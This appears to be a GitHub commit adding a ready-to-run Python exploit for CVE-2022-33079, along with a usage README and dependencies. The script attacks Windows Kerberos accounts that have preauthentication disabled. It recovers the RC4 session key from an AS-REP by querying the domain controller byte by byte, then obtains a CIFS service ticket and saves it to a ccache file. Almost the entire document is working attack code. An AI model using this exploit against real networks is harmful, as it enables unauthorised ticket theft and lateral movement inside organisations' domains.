Skip to content

Commit

Permalink
Adding python exploit
Browse files Browse the repository at this point in the history
  • Loading branch information
Bdenneu committed Nov 2, 2022
1 parent c1b9554 commit aea986f
Show file tree
Hide file tree
Showing 4 changed files with 365 additions and 0 deletions.
353 changes: 353 additions & 0 deletions CVE-2022-33079.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,353 @@
import datetime
import random
import argparse
import logging
import sys
from binascii import hexlify, unhexlify

from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue

from impacket import version
from impacket.examples import logger
from impacket.examples.utils import parse_credentials

from impacket.krb5.kerberosv5 import KerberosError, sendReceive
from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, \
PA_ENC_TS_ENC, AS_REP, EncryptedData, EncASRepPart, seq_set, \
seq_set_iter, KERB_ERROR_DATA, HostAddress, HostAddresses, Ticket
from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REQ, TGS_REP, EncTGSRepPart
from impacket.krb5.types import KerberosTime, Principal
from impacket.krb5.types import Ticket as TTicket
from impacket.krb5 import constants
from impacket.krb5.crypto import Key
from impacket.krb5.ccache import Principal as CPrincipal
from impacket.krb5.ccache import CCache, Header, Credential, Times, CountedOctetString
try:
from impacket.krb5.ccache import KeyBlockV4 as KeyBlock
except:
from impacket.krb5.ccache import KeyBlock

from arc4 import ARC4

try:
rand = random.SystemRandom()
except NotImplementedError:
rand = random
pass

class TGTBrute:
def __init__(self, target, domain, servername, options):
self.__user = target
self.__domain = domain
self.__servername = servername
self.__options = options
self.__kdcHost = options.dc_ip
self.__asReq = None
self.__reqBody = None
self.__encodedPacRequest = None

def prepareAsReq(self, requestPAC=True):
rsadsi_rc4_md4 = -128
self.__asReq = AS_REQ()

domain = self.__domain.upper()
serverName = Principal('krbtgt/%s'%domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
pacRequest = KERB_PA_PAC_REQUEST()
pacRequest['include-pac'] = requestPAC
self.__encodedPacRequest = encoder.encode(pacRequest)

self.__asReq['pvno'] = 5
self.__asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
self.__reqBody = seq_set(self.__asReq, 'req-body')

opts = list()
opts.append( constants.KDCOptions.forwardable.value )
opts.append( constants.KDCOptions.renewable.value )
opts.append( constants.KDCOptions.proxiable.value )
self.__reqBody['kdc-options'] = constants.encodeFlags(opts)

seq_set(self.__reqBody, 'sname', serverName.components_to_asn1)
seq_set(self.__reqBody, 'cname', userName.components_to_asn1)

if domain == '':
raise Exception('Empty Domain not allowed in Kerberos')

now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
self.__reqBody['realm'] = domain
self.__reqBody['till'] = KerberosTime.to_asn1(now)
self.__reqBody['rtime'] = KerberosTime.to_asn1(now)
self.__reqBody['nonce'] = rand.getrandbits(31)
supportedCiphers = (rsadsi_rc4_md4,)
seq_set_iter(self.__reqBody, 'etype', supportedCiphers)

def getTGT(self, requestPAC=True):
self.prepareAsReq()
self.__asReq['padata'] = noValue
self.__asReq['padata'][0] = noValue
self.__asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
self.__asReq['padata'][0]['padata-value'] = self.__encodedPacRequest
for i in range(20): # Add padding for more known bytes:
addr = HostAddress()
addr['addr-type']=1
addr['address']=bytes([0,0,0,i])
self.__reqBody['addresses'][i] = addr
message = encoder.encode(self.__asReq)

try:
r = sendReceive(message, domain, self.__kdcHost)
except KerberosError as e:
if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
logging.error(" RC4 is not supported")
exit()
else:
raise
return r

def sendEncTs(self, data, requestPAC=True):
self.prepareAsReq()

encryptedData = EncryptedData()
encryptedData['etype'] = -128
encryptedData['cipher'] = data
encodedEncryptedData = encoder.encode(encryptedData)

self.__asReq['padata'] = noValue
self.__asReq['padata'][0] = noValue
self.__asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_ENC_TIMESTAMP.value)
self.__asReq['padata'][0]['padata-value'] = encodedEncryptedData
self.__asReq['padata'][1] = noValue
self.__asReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
self.__asReq['padata'][1]['padata-value'] = self.__encodedPacRequest
message = encoder.encode(self.__asReq)
success = True
try:
r = sendReceive(message, domain, self.__kdcHost)
except Exception as e:
success = False
return success

def RecoverKey(self, encryptedAsREP):
AsREPPlain = b'\x00'*24+b'y\x82\x02\x140\x82\x02\x10\xa0\x1b0\x19\xa0\x03\x02\x01\x80\xa1\x12\x04\x10'

RC4Flow = bytes([AsREPPlain[i]^encryptedAsREP[i] for i in range(45)])
#first byte of the key
now = datetime.datetime.utcnow()
Timestamp = (KerberosTime.to_asn1(now)).encode()
sTimestamp = len(Timestamp)+1
encodedTimeStamp = bytes([0 for i in range(24)])+bytes([0x30, sTimestamp+4, 0xa0, sTimestamp+2, 0x18, sTimestamp])+ Timestamp
encryptedTimeStamp = bytes([RC4Flow[i]^encodedTimeStamp[i] for i in range(45)])
found = False
for i in range(256):
if self.sendEncTs(encryptedTimeStamp+bytes([i])):
RC4Flow += bytes([i])
logging.info("Byte 0: %02x"%i)
found = True
break
if found == False:
logging.error("No matching byte")
exit()
for j in range(4):
found = False
encodedTimeStamp = bytes([0 for i in range(24)])+bytes([0x30, 0x81+j])+bytes([0])*j
encodedTimeStamp += bytes([sTimestamp+4, 0xa0, sTimestamp+2, 0x18, sTimestamp])+ Timestamp
encryptedTimeStamp = bytes([RC4Flow[i]^encodedTimeStamp[i] for i in range(46+j)])
for i in range(256):
if self.sendEncTs(encryptedTimeStamp+bytes([i])):
RC4Flow += bytes([i])
logging.info("Byte %d: %02x"%(j+1, i))
found = True
break
if found == False:
logging.error("No matching byte")
exit()
key = bytes([RC4Flow[i]^encryptedAsREP[i] for i in range(45, 50)]+[0xab]*11)
return key

def TGTtoTGS(self, TGT, sessionKey):
rsadsi_rc4_md4 = -128
serverName = Principal('cifs/%s'%self.__servername, type=constants.PrincipalNameType.NT_SRV_INST.value)
ticket = TTicket()
ticket.from_asn1(TGT['ticket'])
apReq = AP_REQ()
apReq['pvno'] = 5
apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)

opts = list()
apReq['ap-options'] = constants.encodeFlags(opts)
seq_set(apReq,'ticket', ticket.to_asn1)

authenticator = Authenticator()
authenticator['authenticator-vno'] = 5
authenticator['crealm'] = TGT['crealm'].asOctets()

clientName = Principal()
clientName.from_asn1( TGT, 'crealm', 'cname')

seq_set(authenticator, 'cname', clientName.components_to_asn1)

now = datetime.datetime.utcnow()
authenticator['cusec'] = now.microsecond
authenticator['ctime'] = KerberosTime.to_asn1(now)

encodedAuthenticator = encoder.encode(authenticator)

cipher = ARC4(sessionKey[:8])
encryptedEncodedAuthenticator = cipher.encrypt(b'\x00'*24+encodedAuthenticator)

apReq['authenticator'] = noValue
apReq['authenticator']['etype'] = rsadsi_rc4_md4
apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator

encodedApReq = encoder.encode(apReq)

tgsReq = TGS_REQ()

tgsReq['pvno'] = 5
tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
tgsReq['padata'] = noValue
tgsReq['padata'][0] = noValue
tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
tgsReq['padata'][0]['padata-value'] = encodedApReq

reqBody = seq_set(tgsReq, 'req-body')

opts = list()
opts.append( constants.KDCOptions.forwardable.value )
opts.append( constants.KDCOptions.renewable.value )
opts.append( constants.KDCOptions.renewable_ok.value )
opts.append( constants.KDCOptions.canonicalize.value )

reqBody['kdc-options'] = constants.encodeFlags(opts)
seq_set(reqBody, 'sname', serverName.components_to_asn1)
reqBody['realm'] = domain

now = datetime.datetime.utcnow() + datetime.timedelta(days=1)

reqBody['till'] = KerberosTime.to_asn1(now)
reqBody['nonce'] = rand.getrandbits(31)
seq_set_iter(reqBody, 'etype',
(
int(constants.EncryptionTypes.rc4_hmac.value),
int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
int(constants.EncryptionTypes.des_cbc_md5.value),
)
)

message = encoder.encode(tgsReq)
r = sendReceive(message, self.__domain, self.__kdcHost)
return r

def TGSToCCache(self, TGS, sessionKey): #from CCache.fromTGT

ccache = CCache()
ccache.headers = []
header = Header()
header['tag'] = 1
header['taglen'] = 8
header['tagdata'] = b'\xff\xff\xff\xff\x00\x00\x00\x00'
ccache.headers.append(header)
tmpPrincipal = Principal()
tmpPrincipal.from_asn1(TGS, 'crealm', 'cname')
ccache.principal = CPrincipal()
ccache.principal.fromPrincipal(tmpPrincipal)

# Now let's add the credential
encryptedTGSREP = bytes(TGS['enc-part']['cipher'])
cipher = ARC4(sessionKey[:8])
plainText = cipher.decrypt(bytes(encryptedTGSREP))[24:]
encTGSRepPart = decoder.decode(plainText, asn1Spec = EncTGSRepPart())[0]

credential = Credential()
server = Principal()
server.from_asn1(encTGSRepPart, 'srealm', 'sname')
tmpServer = CPrincipal()
tmpServer.fromPrincipal(server)
credential['client'] = ccache.principal
credential['server'] = tmpServer
credential['is_skey'] = 0

credential['key'] = KeyBlock()
credential['key']['keytype'] = int(encTGSRepPart['key']['keytype'])
credential['key']['keyvalue'] = encTGSRepPart['key']['keyvalue'].asOctets()
credential['key']['keylen'] = len(credential['key']['keyvalue'])

credential['time'] = Times()
credential['time']['authtime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['authtime']))
credential['time']['starttime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['starttime']))
credential['time']['endtime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['endtime']))
# after kb4586793 for cve-2020-17049 this timestamp may be omitted
if encTGSRepPart['renew-till'].hasValue():
credential['time']['renew_till'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['renew-till']))

flags = ccache.reverseFlags(encTGSRepPart['flags'])
credential['tktflags'] = flags

credential['num_address'] = 0

credential.ticket = CountedOctetString()
credential.ticket['data'] = encoder.encode(TGS['ticket'].clone(tagSet=Ticket.tagSet, cloneValueFlag=True))
credential.ticket['length'] = len(credential.ticket['data'])
credential.secondTicket = CountedOctetString()
credential.secondTicket['data'] = b''
credential.secondTicket['length'] = 0
ccache.credentials.append(credential)
return ccache

def run(self):
logging.info("Getting TGT - Retrieving AS-REP")
tgt = self.getTGT()
decodedtgt = decoder.decode(tgt, asn1Spec = AS_REP())[0]
encryptedAsREP = bytes(decodedtgt['enc-part']['cipher'])
logging.info("Trying to recover the RC4 Flow")
sessionKey = self.RecoverKey(encryptedAsREP)
logging.info("Recovered Session key: %s"%sessionKey.hex())
TGS = self.TGTtoTGS(decodedtgt, sessionKey)
logging.info("Got TGS for %s"%self.__servername)
decodedtgs = decoder.decode(TGS, asn1Spec = TGS_REP())[0]
ccache = self.TGSToCCache(decodedtgs, sessionKey)
logging.info("Saving ticket in %s" % (self.__user+'_'+self.__servername+'.ccache'))
ccache.saveFile(self.__user+'_'+self.__servername+'.ccache')

# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)

parser = argparse.ArgumentParser(add_help = True, description = "Retrieve a TGT for a user having"
"'Do not require Kerberos preauthentication' set and export their TGS of the given server")

parser.add_argument('target', action='store', help='domain/username')
parser.add_argument('serverName', action='store', help='server name')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

group = parser.add_argument_group('authentication')

group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) '
'specified in the target parameter')

options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts)

if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)

domain, username, password = parse_credentials(options.target)
if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)

try:
executer = TGTBrute(username, domain, options.serverName, options)
executer.run()
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))

10 changes: 10 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,2 +1,12 @@
# CVE-2022-33079
One day based on https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html

## Usage

```bash
usage: CVE-2022-33079.py [-h] [-ts] [-debug] [-dc-ip ip address] target serverName
```

## Example

![Alt text](images/example.png "Example")
Binary file added images/example.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
2 changes: 2 additions & 0 deletions requirements.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
impacket==0.10.0
arc4==0.3.0

0 comments on commit aea986f

Please sign in to comment.